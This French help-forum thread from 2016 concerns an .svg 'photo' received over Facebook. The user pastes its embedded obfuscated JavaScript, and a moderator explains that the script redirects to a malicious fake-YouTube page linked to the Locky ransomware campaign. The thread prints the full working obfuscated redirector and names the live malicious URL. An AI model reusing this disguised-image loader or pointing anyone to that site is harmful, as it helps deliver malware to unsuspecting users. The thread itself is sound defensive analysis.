Script java recu sur Facebook !

Résolu/Fermé
BuddyLove_x52 Messages postés 123 Date d'inscription dimanche 12 janvier 2014 Statut Membre Dernière intervention 16 mai 2017 - Modifié par baladur13 le 20/11/2016 à 23:51
BuddyLove_x52 Messages postés 123 Date d'inscription dimanche 12 janvier 2014 Statut Membre Dernière intervention 16 mai 2017 - 6 déc. 2016 à 19:07
Salut tout le monde, j'ai une question !

On m'as envoyé un script sur Facebook ce faisant passé pour une photos. Etant donné que je connais un peut l'informatique j'au pas ouvert la "photos" car je trouvé bizzare qu'elle sois en .svg j'ai donc ouvert avec Notepad et je suis tomber sur ce script :

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "[http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd%22>
<svg http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg] version="1.1" xmlns="[http://www.w3.org/2000/svg%22> http://www.w3.org/2000/svg">]  <circle cx="250" cy="250" r="50" fill="red" />
  <script type="text/javascript"><![CDATA[
    function jzaehxu(lslzqi,dszrj,ztmdf){
      var zdvsmv = "./JHU_SrnVmFZxljy8:d2Y=k3h?CcMbfoaED65zIONK7gPTpLusXBvt0iAR94G1e";
      var rcqlrb = ["OH\/kPZRAU0z3u=heGcELI4B:67TNgtCK58noXS.jmlFy?VvprDbJ1i9_YfaxMd2s",".LKoClD2zOV0xrHkgIhymN?pP1neEGa7:fut_cd\/6SXF=4R9TUMJ5A3bjvZYi8sB","g\/6XIbuf=15eGPvKHF_9saixjC?2rZL:zyJAt0Vhc3OmN.k84Bpn7RoEMDUTdlYS","ko_A1LE6KNS903Te.JbuV27\/pHljYxdZX4RtgmiM8PDc?zvBaIFyns5fh:GCU=Or","XH7x3bYcCiD5g8E.pGeUIavmRZ6VBOkL9KyrS\/=MTJd_1ton0:PjFuN4zA2sf?lh","4M2z_U:eSiJIxP16avjmkL=.s3tlZbDp\/V5?FEO09dgHTfrXBoKGAy7CcRYunhN8","oYui.a3VAcSF5Ed4pt:6nKOR\/e?_HfUN7sbMr9lXLCx8PyIhg0=ZJTG1Bjz2Dkvm","fo:gyRJVjh=eU_sBXZaSTPD5EtA8L\/0m2G1cIF64xvn7r9pYNbl?.3MKzuiHdOkC","verIn5GYVdoK1HA96\/hazRp7:cELUub02PDMTCJ4xOmNgBF3_y8.i=Xsftk?jZSl"];
      var dbtli = "";
      var dhonon = 0;
      while(rcqlrb[dhonon]){
        dhonon++;
      }
      var ucscy = 0;
      while(lslzqi[ucscy]){
        var stoum = 0;
        var mrdfz = -1;
        while(zdvsmv[stoum]){
          if(zdvsmv[stoum] == lslzqi[ucscy]){
            mrdfz = stoum;
            break;
          }
          stoum++;
        }
        if(mrdfz >= 0){
          var wdmdam = 0;
          var vadtty = -1;
          while(rcqlrb[ucscy%dhonon][wdmdam]){
            if(rcqlrb[ucscy%dhonon][wdmdam] == lslzqi[ucscy]){
              vadtty = wdmdam;
              break;
            }
          wdmdam++;
          }
          dbtli += zdvsmv[vadtty];
        }else{
          dbtli += lslzqi[ucscy];
        }
        ucscy++;
      }
      var mhmisv = "";
      for(acaod=dszrj;acaod<dbtli.length;acaod++){
        mhmisv += dbtli[acaod];
      }
      dbtli = mhmisv;
      return dbtli;
    }
  var opree = window;
  var lukdy = jzaehxu("wwLicJs_Ai1R59X",12,false);
  var jjwun = jzaehxu("p1=3w17LP9jzK",5,false);
  var vsyhb = jzaehxu("w15/c/Vzc72SZ",9,false);
  opree[lukdy][jjwun][vsyhb] = jzaehxu("sHSs88eMXph/oc/Gb8sASiK4BMyp.8wHXeYe92BFN4ht3",6,true);
  ]]></script>
</svg>


Quelqu'un peut-il me dire ce qu'il exécute ? Merci ! :)

1 réponse

KX Messages postés 16597 Date d'inscription samedi 31 mai 2008 Statut Modérateur Dernière intervention 26 septembre 2022 2 975
Modifié par KX le 21/11/2016 à 19:44
Bonjour,

"j'au pas ouvert la "photos" car je trouvé bizzare qu'elle sois en .svg"
Pourtant SVG est bien un format image valide : Scalable Vector Graphics

"j'ai donc ouvert avec Notepad et je suis tomber sur ce script"
Effectivement, SVG est un format qui peut se lire (et s'écrire) textuellement au format XML, ce qui ressemble bien à ce que tu nous montres. Et peux aussi exécuter du JavaScript lorsqu'il est lancé dans une page web.

Ton fichier est donc bien une image SVG tout à fait valide, qui dessine un rond rouge... En revanche, lorsque la partie JavaScript est exécutée ça redirige vers une page web, qui ressemble à YouTube (où je déconseillerais de trop s'attarder) http://orezupe.hav.pw/ucirepego.html

Plus d'info sur la manière dont fonctionne SVG, y compris sur sa partie JavaScript (qui n'a rien à voir avec Java) : https://www.alsacreations.com/tuto/lire/1421-svg-initiation-syntaxe-outils.html
La confiance n'exclut pas le contrôle
0
KX Messages postés 16597 Date d'inscription samedi 31 mai 2008 Statut Modérateur Dernière intervention 26 septembre 2022 2 975
Modifié par KX le 23/11/2016 à 18:51
Bonjour,

Je reviens avec cet article d'information :

https://www.lci.fr/high-tech/un-nouveau-virus-locky-se-propage-sur-facebook-messenger-et-linkedin-voici-comment-eviter-de-vous-faire-pieger-2013860.html

Remarque : mon antivirus a été capable de repérer ce fichier comme dangereux et l'a placé en quarantaine (HTML/ExpKit.Gen2)

NB. je déplace ta discussion dans le forum Virus/Sécurité.
0
BuddyLove_x52 Messages postés 123 Date d'inscription dimanche 12 janvier 2014 Statut Membre Dernière intervention 16 mai 2017
6 déc. 2016 à 19:07
Merci de ton aide ! :)
0